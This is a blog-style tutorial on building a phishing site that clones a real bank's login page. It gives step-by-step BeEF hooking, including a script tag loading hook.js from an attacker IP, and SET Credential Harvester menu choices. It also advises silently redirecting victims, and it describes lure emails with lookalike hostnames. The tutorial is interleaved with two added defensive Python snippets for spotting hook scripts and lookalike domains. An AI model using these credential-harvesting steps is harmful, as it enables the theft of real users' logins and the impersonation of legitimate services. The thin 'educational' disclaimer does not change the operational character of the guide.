Create a Phishing Website

Attention: This post is for educational purposes only. I do not advise or encourage anyone to do the following process for malicious reasons.

Phishing is the attempt to obtain sensitive information such as usernames, passwords, and credit card details by posing as a trustworthy entity in an electronic communication. Phishing can be useful during the social engineering step of a Kali Linux penetration testing process. Social engineering is the practice of learning and obtaining valuable information by exploiting human vulnerabilities.

In this post, I'm going to show you how to create a phishing website using two methods: the BeEF XSS Framework and SET. Not only that, I'll talk about how a hacker persuades their target to visit the fake website and obtains the important information.

BeEF XSS Framework

The first thing to do is to duplicate the real website. Go to your chosen website and press CTRL+Shift+I, or right-click and choose Inspect, to inspect the website's elements. Click the HTML tag (shown in the picture below) and press CTRL+C to copy all of the HTML. After that, create a new file containing the HTML you copied and upload the file to your online server.

Here's my fake website that I put on my online hosting server.

After that, launch the BeEF XSS Framework application. This will redirect you to the login page. The default username and password are both beef.

BeEF’s Login Page

To hook an online page so that the BeEF application can start capturing what the user is doing on the hooked page, drag the 'Hook Me!' link (circled in the picture) to the Bookmark Bar.

Then go to the website you're hosting and click the 'Hook Me!' button in your bookmark bar. Another way to hook a page is to insert `<script src="http://<yourIP>:3000/hook.js"></script>` into your code. Now that your page is hooked, BeEF can listen to every event that happens on the page. We can determine the username and password if the user tries to log in, since every action the user takes is recorded in BeEF.

Note: don't forget to modify the code so that when the user clicks the 'Login' button on the fake website, they are redirected to the real website's login page; that way the user will not suspect it is a fake website.
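From the defender's side, the hook described above is visible in the page source: a `<script>` tag whose src points at hook.js on an outside host, typically on port 3000. The following is an added example, not code from the post or from the BeEF project, that scans an HTML document for script sources matching that pattern. The sample page, the trusted host list and the 203.0.113.5 address are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Script filenames that are flagged regardless of where they are loaded from.
HOOK_FILENAMES = {"hook.js"}
# Default port BeEF serves hook.js on (taken from the post's example URL).
BEEF_DEFAULT_PORT = 3000

# Constructed sample page: one local script, one CDN script and one hook.
# 203.0.113.5 is a documentation address standing in for an attacker host.
SAMPLE_PAGE = """<!doctype html>
<html><head><title>Login</title>
<script src="/static/app.js"></script>
<script src="https://cdn.example.com/jquery.min.js"></script>
<script src="http://203.0.113.5:3000/hook.js"></script>
</head><body><form method="post" action="/login"></form></body></html>"""


class _ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value.strip())


def find_hook_scripts(html, trusted_hosts):
    """Return (src, reasons) pairs for script tags that look like a hook injection.

    A src is flagged when its filename is hook.js, when it loads from a host
    that is not in trusted_hosts, or when it targets the BeEF default port.
    Relative sources (no host part) are same-origin and only checked by name.
    """
    collector = _ScriptSrcCollector()
    collector.feed(html)
    flagged = []
    for src in collector.sources:
        parsed = urlparse(src)
        filename = parsed.path.rsplit("/", 1)[-1].lower()
        reasons = []
        if filename in HOOK_FILENAMES:
            reasons.append("hook filename")
        if parsed.netloc:
            host = (parsed.hostname or "").lower()
            if host not in trusted_hosts:
                reasons.append("untrusted host %s" % host)
            if parsed.port == BEEF_DEFAULT_PORT:
                reasons.append("beef default port")
        if reasons:
            flagged.append((src, ", ".join(reasons)))
    return flagged


if __name__ == "__main__":
    for src, why in find_hook_scripts(SAMPLE_PAGE, {"cdn.example.com"}):
        print("suspicious script:", src, "->", why)
```

The check only sees script tags with a src attribute; a hook pasted inline would need a content scan of inline script bodies, which is outside this example. Run it against a saved copy of the page rather than a live fetch so the check is repeatable.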

The Social-Engineer Toolkit (SET)

SET supports everything I did with the BeEF XSS Framework, but without all the hassle. Cloning a website and capturing the sensitive information are simplified to just a few clicks.

Another fake website of mine, but this time the server is my local Kali Linux address.

The picture above looks no different from the site I made earlier, right? The only difference is the IP address of each website.

To clone a website using SET, first open SET by typing setoolkit in your Terminal. The menu shown in the picture below will appear in your Terminal.

Type 1 and press Enter to choose Social-Engineering Attacks.

Then select 2 for the Website Attack Vectors option.

Next, choose the third option, the Credential Harvester method, which clones a website that has username and password fields and harvests all the information posted to it.

Enter 2 to use the Site Cloner feature.

After following the steps above, the last two things to do are to enter the IP address where every user input will be logged by SET, and then the URL of the real website you want to clone.

This is the result when a user clicks the Submit button on the phishing website. The fake website also automatically redirects to the real page.

SET also automatically creates a report of all findings captured.

This shows the location where the reports are saved.

Findings report in XML format

Findings report in HTML format


It is that easy to create a phishing website. But the questions now are: how does the attacker publicize their website to their target, and why do people still think it is the real website?

The common example is to send an email pretending to be from the website, telling the user that there is a problem with their account which must be resolved by logging in to the website first. Without a doubt, the user will click the link and proceed to the login page. Usually, a phishing website has a hostname similar to the real one, e.g. www.ibank.klikbca.com versus www.bank.klikbca.com. Users often do not check small details like that.
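The lookalike hostname is something a mail gateway or a browser extension can check mechanically: compare the hostname of every link against the hostnames the user is known to use and flag near-misses. The following is an added example, not code from the post or from any product, that classifies a link as known, lookalike or unknown using a small Levenshtein edit distance against a constructed list of known-good hostnames; the list and the distance threshold are assumptions for the example.

```python
from urllib.parse import urlparse

# Constructed list of hostnames the user legitimately logs in to.
KNOWN_GOOD_HOSTS = {"www.ibank.klikbca.com", "www.klikbca.com"}
# A hostname this close to a known host, but not equal to it, is suspicious.
MAX_DISTANCE = 2


def edit_distance(a, b):
    """Levenshtein distance between two strings (insert/delete/substitute = 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,            # delete ca
                           cur[j - 1] + 1,         # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def classify_link(url, known_good=KNOWN_GOOD_HOSTS, max_distance=MAX_DISTANCE):
    """Return (verdict, matched_host) for the hostname inside url.

    verdict is one of:
      "known"     - hostname is exactly a known-good host
      "lookalike" - hostname is within max_distance edits of a known-good host
      "unknown"   - hostname is not close to any known-good host
      "invalid"   - url has no hostname (e.g. missing scheme)
    """
    host = (urlparse(url).hostname or "").lower()
    if not host:
        return ("invalid", None)
    if host in known_good:
        return ("known", host)
    closest = min(known_good, key=lambda h: edit_distance(host, h))
    if edit_distance(host, closest) <= max_distance:
        return ("lookalike", closest)
    return ("unknown", None)


if __name__ == "__main__":
    # Constructed links, including the post's own lookalike pair.
    for link in ("https://www.ibank.klikbca.com/login",
                 "https://www.bank.klikbca.com/login",
                 "https://example.org/"):
        print(link, "->", classify_link(link))
```

The check expects a full URL with a scheme; a bare hostname parses as a path and is reported as invalid, which is the safe default for a filter. Edit distance catches dropped or swapped characters like the example on the page, but not homoglyphs or a legitimate brand name placed under an unrelated registered domain, so it is one signal among several, not a verdict on its own.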

Example of Phishing Email

Last but not least, I would like to inform you guys that creating a phishing website for malicious purposes is not cool. Do it for penetration testing only! Oh ya, I also got an email from my hosting provider when I was cloning KlikBCA's front page, saying that someone had reported me for uploading phishing content. It's good to know that today's internet security is pretty secure (let's hope so).

Warning email from Digital Ocean

